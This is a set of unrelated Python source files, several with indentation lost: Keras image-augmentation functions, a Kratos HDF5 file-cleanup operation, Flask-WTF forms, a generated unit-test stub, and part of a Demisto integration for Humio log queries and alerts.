warnings.warn('This ImageDataGenerator specifies '
'`zca_whitening`, but it hasn\'t '
'been fit on any training data. Fit it '
'first by calling `.fit(numpy_data)`.')
return x
def get_random_transform(self, img_shape, seed=None):
"""Generates random parameters for a transformation.
Args:
img_shape: Tuple of integers.
Shape of the image that is transformed.
seed: Random seed.
Returns:
A dictionary containing randomly chosen parameters describing the
transformation.
"""
img_row_axis = self.row_axis - 1
img_col_axis = self.col_axis - 1
if seed is not None:
np.random.seed(seed)
if self.rotation_range:
theta = np.random.uniform(-self.rotation_range, self.rotation_range)
else:
theta = 0
if self.height_shift_range:
try: # 1-D array-like or int
tx = np.random.choice(self.height_shift_range)
tx *= np.random.choice([-1, 1])
except ValueError: # floating point
tx = np.random.uniform(-self.height_shift_range,
self.height_shift_range)
if np.max(self.height_shift_range) < 1:
tx *= img_shape[img_row_axis]
else:
tx = 0
if self.width_shift_range:
try: # 1-D array-like or int
ty = np.random.choice(self.width_shift_range)
ty *= np.random.choice([-1, 1])
except ValueError: # floating point
ty = np.random.uniform(-self.width_shift_range, self.width_shift_range)
if np.max(self.width_shift_range) < 1:
ty *= img_shape[img_col_axis]
else:
ty = 0
if self.shear_range:
shear = np.random.uniform(-self.shear_range, self.shear_range)
else:
shear = 0
if self.zoom_range[0] == 1 and self.zoom_range[1] == 1:
zx, zy = 1, 1
else:
zx, zy = np.random.uniform(self.zoom_range[0], self.zoom_range[1], 2)
flip_horizontal = (np.random.random() < 0.5) * self.horizontal_flip
flip_vertical = (np.random.random() < 0.5) * self.vertical_flip
channel_shift_intensity = None
if self.channel_shift_range != 0:
channel_shift_intensity = np.random.uniform(-self.channel_shift_range,
self.channel_shift_range)
brightness = None
if self.brightness_range is not None:
brightness = np.random.uniform(self.brightness_range[0],
self.brightness_range[1])
transform_parameters = {
'theta': theta,
'tx': tx,
'ty': ty,
'shear': shear,
'zx': zx,
'zy': zy,
'flip_horizontal': flip_horizontal,
'flip_vertical': flip_vertical,
'channel_shift_intensity': channel_shift_intensity,
'brightness': brightness
}
return transform_parameters
def apply_transform(self, x, transform_parameters):
"""Applies a transformation to an image according to given parameters.
Args:
x: 3D tensor, single image.
transform_parameters: Dictionary with string - parameter pairs
describing the transformation.
Currently, the following parameters
from the dictionary are used:
- `'theta'`: Float. Rotation angle in degrees.
- `'tx'`: Float. Shift in the x direction.
- `'ty'`: Float. Shift in the y direction.
- `'shear'`: Float. Shear angle in degrees.
- `'zx'`: Float. Zoom in the x direction.
- `'zy'`: Float. Zoom in the y direction.
- `'flip_horizontal'`: Boolean. Horizontal flip.
- `'flip_vertical'`: Boolean. Vertical flip.
- `'channel_shift_intensity'`: Float. Channel shift intensity.
- `'brightness'`: Float. Brightness shift intensity.
Returns:
A transformed version of the input (same shape).
"""
# x is a single image, so it doesn't have image number at index 0
img_row_axis = self.row_axis - 1
img_col_axis = self.col_axis - 1
img_channel_axis = self.channel_axis - 1
x = apply_affine_transform(
x,
transform_parameters.get('theta', 0),
transform_parameters.get('tx', 0),
transform_parameters.get('ty', 0),
transform_parameters.get('shear', 0),
transform_parameters.get('zx', 1),
transform_parameters.get('zy', 1),
row_axis=img_row_axis,
col_axis=img_col_axis,
channel_axis=img_channel_axis,
fill_mode=self.fill_mode,
cval=self.cval,
order=self.interpolation_order)
if transform_parameters.get('channel_shift_intensity') is not None:
x = apply_channel_shift(x,
transform_parameters['channel_shift_intensity'],
img_channel_axis)
if transform_parameters.get('flip_horizontal', False):
x = flip_axis(x, img_col_axis)
if transform_parameters.get('flip_vertical', False):
x = flip_axis(x, img_row_axis)
if transform_parameters.get('brightness') is not None:
x = apply_brightness_shift(x, transform_parameters['brightness'], False)
return x
def random_transform(self, x, seed=None):
"""Applies a random transformation to an image.
Args:
x: 3D tensor, single image.
seed: Random seed.
Returns:
A randomly transformed version of the input (same shape).
"""
params = self.get_random_transform(x.shape, seed)
return self.apply_transform(x, params)
def fit(self, x, augment=False, rounds=1, seed=None):
"""Fits the data generator to some sample data.
This computes the internal data stats related to the
data-dependent transformations, based on an array of sample data.
Only required if `featurewise_center` or
`featurewise_std_normalization` or `zca_whitening` are set to True.
When `rescale` is set to a value, rescaling is applied to
sample data before computing the internal data stats.
Args:
x: Sample data. Should have rank 4.
In case of grayscale data,
the channels axis should have value 1, in case
of RGB data, it should have value 3, and in case
of RGBA data, it should have value 4.
augment: Boolean (default: False).
Whether to fit on randomly augmented samples.
rounds: Int (default: 1).
If using data augmentation (`augment=True`),
this is how many augmentation passes over the data to use.
seed: Int (default: None). Random seed.
"""
x = np.asarray(x, dtype=self.dtype)
if x.ndim != 4:
raise ValueError('Input to `.fit()` should have rank 4. '
'Got array with shape: ' + str(x.shape))
if x.shape[self.channel_axis] not in {1, 3, 4}:
warnings.warn('Expected input to be images (as Numpy array) '
'following the data format convention "' +
self.data_format + '" (channels on axis ' +
str(self.channel_axis) + '), i.e. expected '
'either 1, 3 or 4 channels on axis ' +
str(self.channel_axis) + '. '
'However, it was passed an array with shape ' +
str(x.shape) + ' (' + str(x.shape[self.channel_axis]) +
' channels).')
if seed is not None:
np.random.seed(seed)
x = np.copy(x)
if self.rescale:
x *= self.rescale
if augment:
ax = np.zeros(
tuple([rounds * x.shape[0]] + list(x.shape)[1:]), dtype=self.dtype)
for r in range(rounds):
for i in range(x.shape[0]):
ax[i + r * x.shape[0]] = self.random_transform(x[i])
x = ax
if self.featurewise_center:
self.mean = np.mean(x, axis=(0, self.row_axis, self.col_axis))
broadcast_shape = [1, 1, 1]
broadcast_shape[self.channel_axis - 1] = x.shape[self.channel_axis]
self.mean = np.reshape(self.mean, broadcast_shape)
x -= self.mean
if self.featurewise_std_normalization:
self.std = np.std(x, axis=(0, self.row_axis, self.col_axis))
broadcast_shape = [1, 1, 1]
broadcast_shape[self.channel_axis - 1] = x.shape[self.channel_axis]
self.std = np.reshape(self.std, broadcast_shape)
x /= (self.std + 1e-6)
if self.zca_whitening:
n = len(x)
flat_x = np.reshape(x, (n, -1))
u, s, _ = np.linalg.svd(flat_x.T, full_matrices=False)
s_inv = np.sqrt(n) / (s + self.zca_epsilon)
self.zca_whitening_matrix = (u * s_inv).dot(u.T)
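# Usage sketch: fit featurewise statistics on synthetic data, then draw and
# apply one random transform. SciPy is assumed to be installed (required by
# `apply_transform`); the random array stands in for a real image set.
def _example_image_data_generator():
  x = np.random.random((10, 28, 28, 3)).astype('float32')
  datagen = ImageDataGenerator(featurewise_center=True,
                               featurewise_std_normalization=True,
                               rotation_range=15,
                               horizontal_flip=True)
  datagen.fit(x)  # computes the `mean` and `std` used by `standardize`
  params = datagen.get_random_transform(x[0].shape, seed=0)
  augmented = datagen.apply_transform(x[0], params)
  return datagen.standardize(augmented).shape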
@keras_export('keras.preprocessing.image.random_rotation')
def random_rotation(x, rg, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random rotation of a Numpy image tensor.
Warning: `tf.keras.preprocessing.image.random_rotation` does not operate on
tensors and is not recommended for new code. Prefer
`tf.keras.layers.RandomRotation` which provides equivalent functionality as a
preprocessing layer. For more information, see the tutorial for
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
Args:
x: Input tensor. Must be 3D.
rg: Rotation range, in degrees.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order: int, order of spline interpolation.
see `ndimage.interpolation.affine_transform`
Returns:
Rotated Numpy image tensor.
"""
theta = np.random.uniform(-rg, rg)
x = apply_affine_transform(x,
theta=theta,
row_axis=row_axis,
col_axis=col_axis,
channel_axis=channel_axis,
fill_mode=fill_mode,
cval=cval,
order=interpolation_order)
return x
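# Usage sketch: rotating a single synthetic channels-last image; the axis
# arguments describe its `(row, col, channel)` layout. SciPy is assumed to be
# installed.
def _example_random_rotation():
  img = np.random.random((64, 64, 3))
  rotated = random_rotation(img, rg=30, row_axis=0, col_axis=1,
                            channel_axis=2)
  return rotated.shape  # unchanged: (64, 64, 3)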
@keras_export('keras.preprocessing.image.random_shift')
def random_shift(x, wrg, hrg, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random spatial shift of a Numpy image tensor.
Warning: `tf.keras.preprocessing.image.random_shift` does not operate on
tensors and is not recommended for new code. Prefer
`tf.keras.layers.RandomTranslation` which provides equivalent functionality as
a preprocessing layer. For more information, see the tutorial for
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
Args:
x: Input tensor. Must be 3D.
wrg: Width shift range, as a float fraction of the width.
hrg: Height shift range, as a float fraction of the height.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order: int, order of spline interpolation.
see `ndimage.interpolation.affine_transform`
Returns:
Shifted Numpy image tensor.
"""
h, w = x.shape[row_axis], x.shape[col_axis]
tx = np.random.uniform(-hrg, hrg) * h
ty = np.random.uniform(-wrg, wrg) * w
x = apply_affine_transform(x,
tx=tx,
ty=ty,
row_axis=row_axis,
col_axis=col_axis,
channel_axis=channel_axis,
fill_mode=fill_mode,
cval=cval,
order=interpolation_order)
return x
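# Usage sketch: shifting a synthetic channels-last image by up to 20% of its
# width and height. SciPy is assumed to be installed.
def _example_random_shift():
  img = np.random.random((64, 64, 3))
  return random_shift(img, wrg=0.2, hrg=0.2, row_axis=0, col_axis=1,
                      channel_axis=2).shape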
@keras_export('keras.preprocessing.image.random_shear')
def random_shear(x, intensity, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random spatial shear of a Numpy image tensor.
Args:
x: Input tensor. Must be 3D.
intensity: Transformation intensity in degrees.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order: int, order of spline interpolation.
see `ndimage.interpolation.affine_transform`
Returns:
Sheared Numpy image tensor.
"""
shear = np.random.uniform(-intensity, intensity)
x = apply_affine_transform(
x,
shear=shear,
row_axis=row_axis,
col_axis=col_axis,
channel_axis=channel_axis,
fill_mode=fill_mode,
cval=cval,
order=interpolation_order)
return x
@keras_export('keras.preprocessing.image.random_zoom')
def random_zoom(x, zoom_range, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random spatial zoom of a Numpy image tensor.
Warning: `tf.keras.preprocessing.image.random_zoom` does not operate on
tensors and is not recommended for new code. Prefer
`tf.keras.layers.RandomZoom` which provides equivalent functionality as
a preprocessing layer. For more information, see the tutorial for
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
Args:
x: Input tensor. Must be 3D.
zoom_range: Tuple of floats; zoom range for width and height.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order: int, order of spline interpolation.
see `ndimage.interpolation.affine_transform`
Returns:
Zoomed Numpy image tensor.
Raises:
ValueError: if `zoom_range` isn't a tuple.
"""
if len(zoom_range) != 2:
raise ValueError('`zoom_range` should be a tuple or list of two'
' floats. Received: %s' % (zoom_range,))
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
x = apply_affine_transform(
x,
zx=zx,
zy=zy,
row_axis=row_axis,
col_axis=col_axis,
channel_axis=channel_axis,
fill_mode=fill_mode,
cval=cval,
order=interpolation_order)
return x
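# Usage sketch: `zoom_range` must be a pair of floats; one zoom factor per
# spatial axis is drawn from it. SciPy is assumed to be installed.
def _example_random_zoom():
  img = np.random.random((64, 64, 3))
  return random_zoom(img, zoom_range=(0.8, 1.2), row_axis=0, col_axis=1,
                     channel_axis=2).shape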
@keras_export('keras.preprocessing.image.apply_channel_shift')
def apply_channel_shift(x, intensity, channel_axis=0):
"""Performs a channel shift.
Args:
x: Input tensor. Must be 3D.
intensity: Transformation intensity.
channel_axis: Index of axis for channels in the input tensor.
Returns:
Numpy image tensor.
"""
x = np.rollaxis(x, channel_axis, 0)
min_x, max_x = np.min(x), np.max(x)
channel_images = [
np.clip(x_channel + intensity, min_x, max_x) for x_channel in x]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_axis + 1)
return x
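# Usage sketch: shifting every channel of a channels-first image by a fixed
# intensity while clipping to the original value range.
def _example_apply_channel_shift():
  img = np.random.random((3, 32, 32))  # channels on axis 0
  return apply_channel_shift(img, intensity=0.1, channel_axis=0).shape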
@keras_export('keras.preprocessing.image.random_channel_shift')
def random_channel_shift(x, intensity_range, channel_axis=0):
"""Performs a random channel shift.
Args:
x: Input tensor. Must be 3D.
intensity_range: Transformation intensity.
channel_axis: Index of axis for channels in the input tensor.
Returns:
Numpy image tensor.
"""
intensity = np.random.uniform(-intensity_range, intensity_range)
return apply_channel_shift(x, intensity, channel_axis=channel_axis)
@keras_export('keras.preprocessing.image.apply_brightness_shift')
def apply_brightness_shift(x, brightness, scale=True):
"""Performs a brightness shift.
Args:
x: Input tensor. Must be 3D.
brightness: Float. The new brightness value.
scale: Whether to rescale the image such that minimum and maximum values
are 0 and 255 respectively. Default: True.
Returns:
Numpy image tensor.
Raises:
ImportError: if PIL is not available.
"""
if ImageEnhance is None:
raise ImportError('Using brightness shifts requires PIL. '
'Install PIL or Pillow.')
x_min, x_max = np.min(x), np.max(x)
local_scale = (x_min < 0) or (x_max > 255)
x = array_to_img(x, scale=local_scale or scale)
  imgenhancer_brightness = ImageEnhance.Brightness(x)
  x = imgenhancer_brightness.enhance(brightness)
x = img_to_array(x)
if not scale and local_scale:
x = x / 255 * (x_max - x_min) + x_min
return x
@keras_export('keras.preprocessing.image.random_brightness')
def random_brightness(x, brightness_range, scale=True):
"""Performs a random brightness shift.
Warning: `tf.keras.preprocessing.image.random_brightness` does not operate on
tensors and is not recommended for new code. Prefer
`tf.keras.layers.RandomBrightness` which provides equivalent functionality as
a preprocessing layer. For more information, see the tutorial for
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
Args:
x: Input tensor. Must be 3D.
brightness_range: Tuple of floats; brightness range.
scale: Whether to rescale the image such that minimum and maximum values
are 0 and 255 respectively. Default: True.
Returns:
Numpy image tensor.
Raises:
      ValueError: if `brightness_range` isn't a tuple.
"""
if len(brightness_range) != 2:
raise ValueError(
        '`brightness_range` should be a tuple or list of two floats. '
'Received: %s' % (brightness_range,))
u = np.random.uniform(brightness_range[0], brightness_range[1])
return apply_brightness_shift(x, u, scale)
def transform_matrix_offset_center(matrix, x, y):
  """Recenters a 3x3 homogeneous transform matrix on the image.

  The transform is conjugated with a translation so that it is applied
  about the image center (x / 2 - 0.5, y / 2 - 0.5) rather than the origin.
  """
  o_x = float(x) / 2 - 0.5
  o_y = float(y) / 2 - 0.5
  offset_matrix = np.array([[1, 0, o_x], [0, 1, o_y], [0, 0, 1]])
  reset_matrix = np.array([[1, 0, -o_x], [0, 1, -o_y], [0, 0, 1]])
  transform_matrix = np.dot(np.dot(offset_matrix, matrix), reset_matrix)
  return transform_matrix
@keras_export('keras.preprocessing.image.apply_affine_transform')
def apply_affine_transform(x, theta=0, tx=0, ty=0, shear=0, zx=1, zy=1,
row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0., order=1):
"""Applies an affine transformation specified by the parameters given.
Args:
x: 3D numpy array - a 2D image with one or more channels.
theta: Rotation angle in degrees.
tx: Width shift.
      ty: Height shift.
      shear: Shear angle in degrees.
      zx: Zoom in x direction.
      zy: Zoom in y direction.
      row_axis: Index of axis for rows (aka Y axis) in the input
        image. Direction: top to bottom.
      col_axis: Index of axis for columns (aka X axis) in the input
        image. Direction: left to right.
channel_axis: Index of axis for channels in the input image.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
order: int, order of interpolation
Returns:
The transformed version of the input.
Raises:
ImportError: if SciPy is not available.
"""
if scipy is None:
raise ImportError('Image transformations require SciPy. '
'Install SciPy.')
# Input sanity checks:
  # 1. x must be a 2D image with one or more channels (i.e., a 3D tensor)
# 2. channels must be either first or last dimension
if np.unique([row_axis, col_axis, channel_axis]).size != 3:
raise ValueError("'row_axis', 'col_axis', and 'channel_axis'"
" must be distinct")
# shall we support negative indices?
valid_indices = set([0, 1, 2])
actual_indices = set([row_axis, col_axis, channel_axis])
if actual_indices != valid_indices:
raise ValueError(
        f'Invalid axes\' indices: {actual_indices - valid_indices}')
if x.ndim != 3:
raise ValueError('Input arrays must be multi-channel 2D images.')
if channel_axis not in [0, 2]:
    raise ValueError('Channels are only allowed in the first or last dimension.')
transform_matrix = None
if theta != 0:
theta = np.deg2rad(theta)
rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0],
[np.sin(theta), np.cos(theta), 0],
[0, 0, 1]])
transform_matrix = rotation_matrix
if tx != 0 or ty != 0:
shift_matrix = np.array([[1, 0, tx],
[0, 1, ty],
[0, 0, 1]])
if transform_matrix is None:
transform_matrix = shift_matrix
else:
transform_matrix = np.dot(transform_matrix, shift_matrix)
if shear != 0:
shear = np.deg2rad(shear)
shear_matrix = np.array([[1, -np.sin(shear), 0],
[0, np.cos(shear), 0],
[0, 0, 1]])
if transform_matrix is None:
transform_matrix = shear_matrix
else:
transform_matrix = np.dot(transform_matrix, shear_matrix)
if zx != 1 or zy != 1:
zoom_matrix = np.array([[zx, 0, 0],
[0, zy, 0],
[0, 0, 1]])
if transform_matrix is None:
transform_matrix = zoom_matrix
else:
transform_matrix = np.dot(transform_matrix, zoom_matrix)
if transform_matrix is not None:
h, w = x.shape[row_axis], x.shape[col_axis]
transform_matrix = transform_matrix_offset_center(
transform_matrix, h, w)
x = np.rollaxis(x, channel_axis, 0)
# Matrix construction assumes that coordinates are x, y (in that order).
# However, regular numpy arrays use y,x (aka i,j) indexing.
# Possible solution is:
# 1. Swap the x and y axes.
# 2. Apply transform.
# 3. Swap the x and y axes again to restore image-like data ordering.
# Mathematically, it is equivalent to the following transformation:
# M' = PMP, where P is the permutation matrix, M is the original
# transformation matrix.
if col_axis > row_axis:
transform_matrix[:, [0, 1]] = transform_matrix[:, [1, 0]]
transform_matrix[[0, 1]] = transform_matrix[[1, 0]]
final_affine_matrix = transform_matrix[:2, :2]
final_offset = transform_matrix[:2, 2]
channel_images = [ndimage.interpolation.affine_transform( # pylint: disable=g-complex-comprehension
x_channel,
final_affine_matrix,
final_offset,
order=order,
mode=fill_mode,
cval=cval) for x_channel in x]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_axis + 1)
return x
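if __name__ == '__main__':
  # Hedged usage sketch (not part of the original module): exercises
  # `apply_affine_transform` and `random_zoom` on a dummy channels-last image.
  # Assumes NumPy and SciPy are importable, which the functions above already
  # require; the sizes and transform parameters are arbitrary demo values.
  demo = np.random.uniform(0, 255, size=(32, 32, 3))
  rotated = apply_affine_transform(
      demo, theta=30, zx=1.2, zy=1.2,
      row_axis=0, col_axis=1, channel_axis=2)
  zoomed = random_zoom(
      demo, (0.8, 1.2), row_axis=0, col_axis=1, channel_axis=2)
  print(rotated.shape, zoomed.shape)  # both keep the input shape (32, 32, 3)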
|
'''HDF5 operating system operations.
license: HDF5Application/license.txt
Main authors:
Philipp Bucher
Michael Andre
'''
import KratosMultiphysics
import KratosMultiphysics.kratos_utilities as _utils
import os
class DeleteOldH5Files(object):
'''Delete h5-files from previous simulations.'''
def __call__(self, model_part, hdf5_file):
file_path, file_name = os.path.split(hdf5_file.GetFileName())
time_prefix = file_name.replace(".h5", "") + "-"
current_time = model_part.ProcessInfo[KratosMultiphysics.TIME]
if file_path == "":
file_path = "." # os.listdir fails with empty path
for name in os.listdir(file_path):
if name.startswith(time_prefix):
file_time = float(name.replace(".h5", "")[len(time_prefix):])
                # Results written after the current (restart) time belong to a
                # previous, longer run and are removed.
                if file_time > current_time:
_utils.DeleteFileIfExisting(
os.path.join(file_path, name))
def Create(settings):
'''Return an operation specified by the setting's 'operation_type'.
This method is normally not used directly, but rather it is imported
in core.operations.model_part.Create using the 'module_name' setting.
'''
operation_type = settings['operation_type'].GetString()
if operation_type == 'delete_old_h5_files':
return DeleteOldH5Files()
else:
raise ValueError(
'"operation_type" has invalid value "' + operation_type + '"')
|
from flask_wtf import FlaskForm
from wtforms import StringField, TextAreaField, SubmitField, SelectField
# Note: 'Required' is a legacy alias of DataRequired in WTForms 2.x (removed in 3.0).
from wtforms.validators import Required
class CommentsForm(FlaskForm):
comment = TextAreaField('Comment', validators=[Required()])
submit = SubmitField('SUBMIT')
class UpdateProfile(FlaskForm):
bio = TextAreaField('Tell us about you.',validators = [Required()])
submit = SubmitField('Submit')
class BlogForm(FlaskForm):
title = StringField('Enter title',validators = [Required()])
subtitle= StringField('Enter subtitle',validators = [Required()])
content = TextAreaField('make a blog', validators=[Required()])
submit = SubmitField('Create Blog')
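# Hedged usage sketch (not part of the original module): how CommentsForm would
# typically be consumed in a Flask view. 'app', 'comment.html', 'save_comment'
# and the route name are hypothetical, not defined in this project file.
#
#     @app.route('/comment/new', methods=['GET', 'POST'])
#     def new_comment():
#         form = CommentsForm()
#         if form.validate_on_submit():
#             save_comment(form.comment.data)
#             return redirect(url_for('index'))
#         return render_template('comment.html', comments_form=form)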
|
"""
NLP Sandbox Date Annotator API
# Overview The OpenAPI specification implemented by NLP Sandbox Annotators. # noqa: E501
The version of the OpenAPI document: 1.1.1
Contact: thomas.schaffter@sagebionetworks.org
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import nlpsandbox
from nlpsandbox.model.text_covid_symptom_annotation import TextCovidSymptomAnnotation
globals()['TextCovidSymptomAnnotation'] = TextCovidSymptomAnnotation
from nlpsandbox.model.text_covid_symptom_annotation_response import TextCovidSymptomAnnotationResponse
class TestTextCovidSymptomAnnotationResponse(unittest.TestCase):
"""TextCovidSymptomAnnotationResponse unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testTextCovidSymptomAnnotationResponse(self):
"""Test TextCovidSymptomAnnotationResponse"""
# FIXME: construct object with mandatory attributes with example values
# model = TextCovidSymptomAnnotationResponse() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
import json
from datetime import datetime
from typing import Dict
import requests
import demistomock as demisto
from CommonServerPython import *
""" IMPORTS """
# Disable insecure warnings from urllib3
# - this does not disable SSL checking, just the warnings logged from urllib3
requests.packages.urllib3.disable_warnings()
""" CLASS for Humio"""
class Client:
def __init__(self, base_url, verify, proxies):
self.base_url = base_url
self.verify = verify
self.proxies = proxies
def http_request(self, method, url_suffix, data=None, headers=None):
server = self.base_url + url_suffix
res = requests.request(
method,
server,
json=data,
verify=self.verify,
headers=headers,
proxies=self.proxies,
)
return res
def test_module(client, headers=None):
response = client.http_request("GET", "/api/v1/status")
headers = {} if headers is None else headers
if response.status_code == 200:
try:
resp = response.json()
except Exception:
return "Could connect to server, but got unexpected response: {}".format(
response.text
)
if resp["status"].lower() == "ok":
incidentquery = demisto.params().get("queryParameter")
incidentrepo = demisto.params().get("queryRepository")
if incidentquery is not None and incidentrepo is not None:
args = {
"queryString": incidentquery,
"repository": incidentrepo,
"start": "1m",
"end": "now",
"isLive": "false",
"timeZoneOffsetMinutes": 0,
}
humio_query(client, args, headers)
return "ok"
else:
return "ok"
else:
return "Bad status from server: ({}) {}".format(
response.status_code, response.text
)
def humio_query(client, args, headers):
data = {}
data["queryString"] = args.get("queryString")
try:
data["start"] = int(args.get("start"))
except ValueError:
data["start"] = args.get("start")
try:
data["end"] = int(args.get("end"))
except ValueError:
data["end"] = args.get("end")
data["isLive"] = args.get("isLive").lower() in ["true", "1", "t", "y", "yes"]
data["timeZoneOffsetMinutes"] = int(args.get("timeZoneOffsetMinutes", 0))
if args.get("arguments"):
data["arguments"] = args.get("arguments")
url = "/api/v1/repositories/" + args.get("repository") + "/query"
headers["Accept"] = "application/json"
response = client.http_request("POST", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Query Results", result, removeNull=True)
outputs = {"Humio.Query": [result]}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_query_job(client, args, headers):
data = {}
data["queryString"] = args.get("queryString")
data["start"] = args.get("start")
data["end"] = args.get("end")
data["isLive"] = args.get("isLive").lower() in ["true", "1", "t", "y", "yes"]
data["timeZoneOffsetMinutes"] = int(args.get("timeZoneOffsetMinutes"))
if args.get("arguments"):
data["arguments"] = args.get("arguments")
url = "/api/v1/repositories/" + args.get("repository") + "/queryjobs"
headers["Accept"] = "application/json"
response = client.http_request("POST", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Query Job", result, removeNull=True)
outputs = {"Humio.Job": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_poll(client, args, headers):
data: Dict[str, str] = {}
url = (
"/api/v1/repositories/"
+ args.get("repository")
+ "/queryjobs/"
+ args.get("id")
)
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
result = response.json()
result["job_id"] = args.get("id")
markdown = tableToMarkdown(
"Humio Poll Result", result.get("events", []), removeNull=True
)
outputs = {"Humio.Result(val.job_id == obj.job_id)": result}
return markdown, outputs, result
elif response.status_code == 404:
raise ValueError(response.text)
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_delete_job(client, args, headers):
data: Dict[str, str] = {}
url = (
"/api/v1/repositories/"
+ args.get("repository")
+ "/queryjobs/"
+ args.get("id")
)
headers["Accept"] = "application/json"
response = client.http_request("DELETE", url, data, headers)
if response.status_code == 204:
return "Command executed. Status code " + str(response), None, None
elif response.status_code == 404:
raise ValueError(response.text)
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_list_alerts(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alerts"
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Alerts", result, removeNull=True)
outputs = {"Humio.Alert(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_get_alert_by_id(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alerts/" + args.get("id")
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
if not response.text:
raise ValueError("Alert with id " + str(args.get("id")) + " not found")
result = response.json()
markdown = tableToMarkdown("Humio Alerts", result, removeNull=True)
outputs = {"Humio.Alert(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_create_alert(client, args, headers):
fulldata = {}
data = {}
data["queryString"] = args.get("queryString")
data["start"] = args.get("start")
data["end"] = "now"
data["isLive"] = True
fulldata["name"] = args.get("name")
fulldata["description"] = args.get("description", "")
fulldata["throttleTimeMillis"] = int(args.get("throttleTimeMillis"))
fulldata["silenced"] = args.get("silenced", "false").lower() in [
"true",
"1",
"t",
"y",
"yes",
]
fulldata["notifiers"] = [
notifier for notifier in args.get("notifiers").split(",") if notifier
]
fulldata["labels"] = [label for label in args.get("labels", "").split(",") if label]
fulldata["query"] = data
url = "/api/v1/repositories/" + args.get("repository") + "/alerts"
headers["Accept"] = "application/json"
response = client.http_request("POST", url, fulldata, headers)
if response.status_code == 201:
result = response.json()
markdown = tableToMarkdown("Humio Alerts", result, removeNull=True)
outputs = {"Humio.Alert(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_delete_alert(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alerts/" + args.get("id")
headers["Accept"] = "application/json"
response = client.http_request("DELETE", url, data, headers)
if response.status_code == 204:
return ("Command executed. Status code " + str(response), None, None)
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_list_notifiers(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alertnotifiers"
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Notifiers", result, removeNull=True)
outputs = {"Humio.Notifier(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_get_notifier_by_id(client, args, headers):
data: Dict[str, str] = {}
url = (
"/api/v1/repositories/"
